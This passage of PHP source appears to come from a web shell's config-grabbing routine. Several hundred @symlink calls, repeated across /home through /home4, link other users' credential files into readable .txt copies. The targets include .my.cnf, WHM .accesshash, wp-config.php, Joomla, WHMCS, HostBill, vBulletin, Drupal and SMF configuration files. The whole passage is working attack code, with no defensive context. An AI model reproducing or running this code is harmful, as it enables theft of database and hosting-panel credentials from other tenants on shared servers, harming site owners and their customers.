3260. @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3261. @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3262. @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3263. @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3264. @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3265. @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3266. @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3267. @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3268. @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3269. @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3270. @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3271. @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3272. @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3273. @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3274. @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3275. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3276. @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3277. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3278. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3279. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3280. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3281. @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3282. @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3283. @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3284. @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3285. @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3286. @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3287. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3288. @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3289. @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3290. @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3291. @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3292. @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3293. @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3294. @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3295. @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3296. @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3297. @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3298. @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3299. @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3300. @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3301. @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3302. @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3303. @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3304. @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3305. @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3306. @symlink('/home2/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3307. @symlink('/home2/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3308. @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3309. @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3310. @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3311. @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3312. @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3313. @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3314. @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3315. @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3316. @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3317. @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3318. @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3319. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3320. @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3321. @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3322. @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3323. @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3324. @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3325. @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3326. @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3327. @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3328. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3329. @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3330. @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3331. @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3332. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3333. @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3334. @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3335. @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3336. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3337. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3338. @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3339. @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt');
3340. @symlink('/home2/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3341. @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3342. @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3343. @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3344. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3345. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3346. @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3347. @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3348. @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3349. @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3350. @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3351. @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3352. @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3353. @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3354. @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt');
3355. @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3356. @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3357. @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3358. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3359. @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3360. @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3361. @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3362. @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3363. @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3364. @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3365. @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3366. @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3367. @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3368. @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3369. @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3370. @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3371. @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3372. @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3373. @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3374. @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3375. @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3376. @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3377. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3378. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt');
3379. @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3380. @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3381. @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3382. @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3383. @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3384. @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3385. @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3386. @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3387. @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3388. @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3389. @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3390. @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3391. @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3392. @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3393. @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3394. @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3395. @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3396. @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3397. @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3398. @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3399. @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3400. @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3401. @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3402. @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3403. @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3404. @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3405. @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3406. @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3407. @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3408. @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3409. @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3410. @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3411. @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3412. @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3413. @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3414. @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3415. @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3416. @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3417. @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3418. @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3419. @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3420. @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3421. @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3422. @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3423. @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3424. @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3425. @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3426. @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3427. @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3428. @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3429. @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3430. @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3431. @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3432. @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3433. @symlink('/home3/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3434. @symlink('/home3/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3435. @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3436. @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3437. @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3438. @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3439. @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3440. @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3441. @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3442. @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3443. @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3444. @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3445. @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3446. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3447. @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3448. @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3449. @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3450. @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3451. @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3452. @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3453. @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3454. @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3455. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3456. @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3457. @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3458. @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3459. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3460. @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3461. @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3462. @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3463. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3464. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3465. @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3466. @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt');
3467. @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3468. @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3469. @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3470. @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3471. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3472. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3473. @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3474. @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3475. @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3476. @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3477. @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3478. @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3479. @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3480. @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3481. @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt');
3482. @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3483. @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3484. @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3485. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3486. @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3487. @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3488. @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3489. @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3490. @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3491. @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3492. @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3493. @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3494. @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3495. @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3496. @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3497. @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3498. @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3499. @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3500. @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3501. @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3502. @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3503. @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3504. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3505. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt');
3506. @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3507. @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3508. @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3509. @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3510. @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3511. @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3512. @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3513. @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3514. @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3515. @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3516. @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3517. @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3518. @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3519. @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3520. @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3521. @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3522. @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3523. @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3524. @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3525. @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3526. @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3527. @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3528. @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3529. @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3530. @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3531. @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3532. @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3533. @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3534. @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3535. @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3536. @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3537. @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3538. @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3539. @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3540. @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3541. @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3542. @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3543. @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3544. @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3545. @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3546. @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3547. @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3548. @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3549. @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3550. @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3551. @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3552. @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3553. @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3554. @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3555. @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3556. @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3557. @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3558. @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3559. @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3560. @symlink('/home4/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3561. @symlink('/home4/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3562. @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
